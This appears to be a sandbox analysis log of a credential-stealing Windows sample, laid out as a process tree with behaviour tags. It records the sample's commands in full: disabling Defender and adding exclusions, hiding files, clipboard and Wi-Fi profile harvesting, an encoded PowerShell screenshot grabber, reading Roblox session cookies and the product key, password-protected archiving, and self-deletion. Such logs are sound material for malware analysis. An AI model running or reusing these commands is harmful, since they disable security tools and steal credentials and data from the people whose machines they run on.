    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4072
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4200
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    PID:1932
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1264
    - - C:\Windows\Temp\{B01131D2-A3CE-4387-BABE-EE922999EB5E}\.cr\bound.exe
        
        "C:\Windows\Temp\{B01131D2-A3CE-4387-BABE-EE922999EB5E}\.cr\bound.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\bound.exe" -burn.filehandle.attached=700 -burn.filehandle.self=704
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:2324
      - C:\Windows\Temp\{92B4DCD2-9621-4156-AACA-609874187617}\.be\dotnet-sdk-8.0.403-win-x64.exe
        
        "C:\Windows\Temp\{92B4DCD2-9621-4156-AACA-609874187617}\.be\dotnet-sdk-8.0.403-win-x64.exe" -q -burn.elevated BurnPipe.{E7521840-5A49-4C9B-911B-EB977ED32296} {C094602C-58BE-4C34-A57C-689EF0D11B24} 2324
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:3704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:2248
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe"
      4⤵
      Views/modifies file attributes
      PID:436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4268
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4764
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3672
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3704
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:4468
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4812
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4792
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:2952
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4604
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2100
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:3200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1620
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5100
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ta4a50du\ta4a50du.cmdline"
        5⤵
        
        PID:3644
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB67F.tmp" "c:\Users\Admin\AppData\Local\Temp\ta4a50du\CSC482182D52F2A4143A9202D1A5596C0C8.TMP"
        6⤵
        
        PID:772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1348
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4024
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:4492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3676
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4792
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:2096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1908
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:5064
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2248
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1224
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2736
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1692
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:4840
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1908
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:4072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI48722\rar.exe a -r -hp"kali" "C:\Users\Admin\AppData\Local\Temp\MtMw5.zip" *"
    3⤵
    PID:3448
  - - C:\Users\Admin\AppData\Local\Temp\_MEI48722\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI48722\rar.exe a -r -hp"kali" "C:\Users\Admin\AppData\Local\Temp\MtMw5.zip" *
      4⤵
      Executes dropped EXE
      PID:3784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:3676
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:1960
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2716
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:3240
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:1108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:4232
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:3820
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:744
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Built.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:828
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:3580

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:4036
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 27825E39B767CE14DBA4695993B719A9
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:1548
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 210247ABAF0D862D80A9941BCAF399C7
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:2784
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 2DFB4AB44038E352D7C2E9109926559B
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:8
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 7F4A545D511A4495C433E197C57AF072
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:4652
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding EFF47FFE7C118842E6118E6E05250269
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:4460
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding F27B5A8C2709CC7842A3818F8A329373
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:4896
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 9BDF9BC85302742BCBCF64D83245A302
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:3676
- C:\Windows\syswow64\MsiExec.exe
